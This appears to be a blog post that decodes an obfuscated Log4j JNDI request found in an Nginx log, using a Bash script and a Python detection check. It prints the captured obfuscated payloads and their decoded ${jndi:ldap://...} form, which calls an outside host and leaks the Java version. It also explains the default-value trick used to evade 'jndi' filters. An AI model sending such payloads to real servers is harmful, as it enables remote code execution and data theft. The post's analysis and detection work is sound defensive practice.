Recently, I saw a person asking a question in one of the Telegram groups that I’ve joined.

The person asked whether anyone knew what kind of request this is, and gave the following log lines, saying they came from an Nginx log:

10.0.0.170 - - [07/Aug/2023:08:30:53 +0000] "GET /${${u:n1:9:-j}${lr9t:-n}${uh:9n:-d}${o3k:j:-i}${s:4w:-:}${q:-l}${awd:-d}${h76x:-a}${y:c:-p}${t5i8:jtf5:-:}${m9:v12:-/}${a:sl8k:hdm8:-/}${gj:r2lq:-P}${6:0:-A}${e58:s0:-l}${7zyk:c:-0}${cw:9et:ute:-c}${tf:79jg:--}${${3sfd:14r:-s}${plvu:-y}${f:-s}${bi0:3:-:}${n7du:vjn5:s9ur:-j}${7c9y:-a}${bgw:p2:0:-v}${wn1z:u8q:97b5:-a}${3r4:todc:-.}${oe3g:318:xt1:-v}${mxps:-e}${ie7:7:iv6:-r}${2yl0:x:28eh:-s}${grtd:zm9t:-i}${3j:-o}${6stx:f:-n}}${ifx:8x1b:-.}${9ot:4xbq:as:-1}${5yg:mj4l:-f}${0o:-7}${o5:-1}${y:8c:-8}${7l45:7vlp:hw:-e}${d3:uiqe:-d}${akg:6gc:n26:-c}${hvl:gud1:-f}${at5:9:-2}${e:-c}${u24c:-0}${obl:ps:n:-f}${iq:-9}${kf0:fa:-f}${ubg:ymae:m8a:-c}${e47q:-5}${zq:gnx:dp:-c}${p:-c}${6r:2je3:-f}${kja8:4wk:wy2t:-c}${8oz:n:-0}${rw:-6}${fr:-6}${zj:-b}${tki:-9}${1l5:-8}${6bw1:8p:9j51:-7}${irbs:-3}${32:i:-c}${h:8jxp:3p:-3}${m8:1:-c}${yp:p:yet:-3}${e:a:-3}${op:-8}${86:1:lf0:-f}${k:e:-d}${u:-9}${y9d:576:-0}${4:af:-e}${q:b5l:-2}${if5:-a}${wb6:ica:-.}${7n:-z}${8qch:kp2i:i1xh:-.}${mbix:hd:-7}${jod:4:-b}${z89:hrp:-a}${xdv:w:te:-e}${s:9e:-.}${fuz:uk2:y:-x}${j:tg:-y}${7:-z}} HTTP/1.1" 404 6622 
"${${ao:-j}${8w:-n}${3:-d}${jwi:-i}${c:zcwm:tdvi:-:}${yme:-l}${hze:nkbo:-d}${oe3:8gp:-a}${s1:-p}${2:0:yxq:-:}${k:4g:-/}${7:-/}${bz:-R}${au02:ohx:-E}${7sv:-l}${vazk:-0}${i:-c}${vq:--}${${tde:o:-s}${0:n:kp:-y}${58q0:dkei:-s}${9:5:-:}${ya0:fpa:-j}${4:-a}${i:-v}${ro:tja:-a}${yw:oy:-.}${c8:-v}${ajk:dc:-e}${vqp6:-r}${jwk:e:2:-s}${pin1:-i}${t17:-o}${zlc5:xsm:xe:-n}}${2j:-.}${pu:q:-1}${awp:t:-f}${1f:-7}${e:q0:-1}${k:-8}${e:w9:-e}${nbxi:-d}${zmn5:-c}${n0o:qm:-f}${1qs:6ja7:-2}${pcs:5:-c}${jc:-0}${yg:-f}${r:-9}${qkz0:4dm:3:-f}${lpje:r:34:-c}${si7:-5}${c:nrq:-c}${l1:-c}${n:e24:a:-f}${sx3i:1wx:-c}${0:re:7:-0}${j8l:yv:y8:-6}${xcmy:m:xly6:-6}${xoug:y0t:lvd:-b}${7rl:ms:-9}${o3vj:h:w:-8}${tofq:1mky:1q:-7}${2j:tf:49if:-3}${8zj:q:1o:-c}${2anb:u4:-3}${y:-c}${rxz:2us:3r:-3}${fy1u:b1:-3}${o:3:-8}${e6:gy:9qj:-f}${8sc9:-d}${op:5d8q:p4v:-9}${fu:bza6:ljh:-0}${t1:q:-e}${pzsx:-2}${s81x:-a}${ht:7nja:1x:-.}${xd:1g:7k:-z}${bgt:g7b:pkj7:-.}${eiu8:k8m:-7}${ng:kbtm:4d0a:-b}${rh:8f42:-a}${v:8:5:-e}${mbv:cxyn:h9ko:-.}${sq32:-x}${pqe:-y}${8vt3:j:-z}}" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" "34.68.34.76"

I had never seen this kind of request before, and a quick Googling did not turn up any answers either.

On closer inspection of the request line, it appears to be obfuscated: the request uses a syntax that looks like the Bash parameter expansion feature (${name:-default}).

Let’s try to translate the line one token at a time:

${u:n1:9:-j}
${lr9t:-n}
${uh:9n:-d}
${o3k:j:-i}

Which translates into:

jndi

So, let’s create a script that extracts the value after the “:-” in each token:

#!/bin/bash

# Your obfuscated string (the inner part of the ${...} lookup seen in the log)
string='${u:n1:9:-j}${lr9t:-n}${uh:9n:-d}${o3k:j:-i}${s:4w:-:}${q:-l}${awd:-d}${h76x:-a}${y:c:-p}${t5i8:jtf5:-:}${m9:v12:-/}${a:sl8k:hdm8:-/}${gj:r2lq:-P}${6:0:-A}${e58:s0:-l}${7zyk:c:-0}${cw:9et:ute:-c}${tf:79jg:--}${${3sfd:14r:-s}${plvu:-y}${f:-s}${bi0:3:-:}${n7du:vjn5:s9ur:-j}${7c9y:-a}${bgw:p2:0:-v}${wn1z:u8q:97b5:-a}${3r4:todc:-.}${oe3g:318:xt1:-v}${mxps:-e}${ie7:7:iv6:-r}${2yl0:x:28eh:-s}${grtd:zm9t:-i}${3j:-o}${6stx:f:-n}}${ifx:8x1b:-.}${9ot:4xbq:as:-1}${5yg:mj4l:-f}${0o:-7}${o5:-1}${y:8c:-8}${7l45:7vlp:hw:-e}${d3:uiqe:-d}${akg:6gc:n26:-c}${hvl:gud1:-f}${at5:9:-2}${e:-c}${u24c:-0}${obl:ps:n:-f}${iq:-9}${kf0:fa:-f}${ubg:ymae:m8a:-c}${e47q:-5}${zq:gnx:dp:-c}${p:-c}${6r:2je3:-f}${kja8:4wk:wy2t:-c}${8oz:n:-0}${rw:-6}${fr:-6}${zj:-b}${tki:-9}${1l5:-8}${6bw1:8p:9j51:-7}${irbs:-3}${32:i:-c}${h:8jxp:3p:-3}${m8:1:-c}${yp:p:yet:-3}${e:a:-3}${op:-8}${86:1:lf0:-f}${k:e:-d}${u:-9}${y9d:576:-0}${4:af:-e}${q:b5l:-2}${if5:-a}${wb6:ica:-.}${7n:-z}${8qch:kp2i:i1xh:-.}${mbix:hd:-7}${jod:4:-b}${z89:hrp:-a}${xdv:w:te:-e}${s:9e:-.}${fuz:uk2:y:-x}${j:tg:-y}${7:-z}'

# Repeatedly collapse the innermost ${name:-value} tokens to their value, working
# from the inside out. Nested lookups that carry no ":-" default, such as the
# ${sys:java.version} that the inner group spells out, are left intact, so their
# surrounding ${...} is not lost the way a flat grep for ':-' would lose it.
result="$string"
while true; do
    next=$(printf '%s' "$result" | sed -E 's/\$[{][^{}]*:-([^{}]*)[}]/\1/g')
    [ "$next" = "$result" ] && break
    result="$next"
done

echo "$result" # Outputs "jndi:ldap://PAl0c-${sys:java.version}..."

Replace the “string” value with the obfuscated string observed in the log.

Save the script and run it. Ta Daa! The decoded request is shown below; it seems related to Log4j JNDI exploitation:

10.0.0.170 - - [07/Aug/2023:08:30:53 +0000] "GET /${jndi:ldap://PAl0c-${sys:java.version}.1f718edcf2c0f9fc5ccfc066b9873c3c338fd90e2a.z.7bae.xyz} HTTP/1.1" 404 6622 "${jndi:ldap://REl0c-${sys:java.version}.1f718edcf2c0f9fc5ccfc066b9873c3c338fd90e2a.z.7bae.xyz}" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36" "34.68.34.76"
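As an added example (not code from the original post), here is a Python version of the same de-obfuscation that resolves the nested lookups properly and turns the result into a detection check: Log4j’s lookup syntax, like Bash, reads ${name:-default} as “use default when name is undefined”, which is exactly why a pattern match for “jndi” on the raw request line finds nothing. The SAMPLE string is assembled from the tokens quoted in the post, with the outer ${...} wrapper added back and the long hostname tail shortened.

```python
import re

# Innermost ${...} lookup, i.e. one whose body contains no further braces.
LOOKUP = re.compile(r"\$\{([^{}]*)\}")


def _resolve(match: re.Match) -> str:
    body = match.group(1)
    if ":-" in body:
        # ${junk:-X}: the name is never defined, so only the default X survives.
        # Split on the first ':-' so that ${tf:79jg:--} yields a single '-'.
        return body.split(":-", 1)[1]
    # No default (e.g. ${sys:java.version}): this is real lookup content,
    # not padding, so keep it verbatim including its braces.
    return match.group(0)


def deobfuscate(s: str) -> str:
    """Collapse nested default-value lookups from the inside out."""
    while True:
        resolved = LOOKUP.sub(_resolve, s)
        if resolved == s:
            return s
        s = resolved


def is_jndi_lookup(s: str) -> bool:
    """Detection check: does the request decode to a ${jndi:...} lookup?"""
    return "${jndi:" in deobfuscate(s).lower()


# Constructed sample built from the tokens quoted in the post; the hostname
# tail is shortened to keep the example readable.
SAMPLE = (
    "${"
    "${u:n1:9:-j}${lr9t:-n}${uh:9n:-d}${o3k:j:-i}${s:4w:-:}${q:-l}${awd:-d}"
    "${h76x:-a}${y:c:-p}${t5i8:jtf5:-:}${m9:v12:-/}${a:sl8k:hdm8:-/}"
    "${gj:r2lq:-P}${6:0:-A}${e58:s0:-l}${7zyk:c:-0}${cw:9et:ute:-c}${tf:79jg:--}"
    "${${3sfd:14r:-s}${plvu:-y}${f:-s}${bi0:3:-:}${n7du:vjn5:s9ur:-j}${7c9y:-a}"
    "${bgw:p2:0:-v}${wn1z:u8q:97b5:-a}${3r4:todc:-.}${oe3g:318:xt1:-v}${mxps:-e}"
    "${ie7:7:iv6:-r}${2yl0:x:28eh:-s}${grtd:zm9t:-i}${3j:-o}${6stx:f:-n}}"
    "${wb6:ica:-.}${7n:-z}${8qch:kp2i:i1xh:-.}${mbix:hd:-7}${jod:4:-b}${z89:hrp:-a}"
    "${xdv:w:te:-e}${s:9e:-.}${fuz:uk2:y:-x}${j:tg:-y}${7:-z}"
    "}"
)

if __name__ == "__main__":
    print(deobfuscate(SAMPLE), is_jndi_lookup(SAMPLE))
```

Running the decoder in a log pipeline before the “jndi” match is what makes the obfuscated form visible; the raw request line never contains the substring.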

By zam
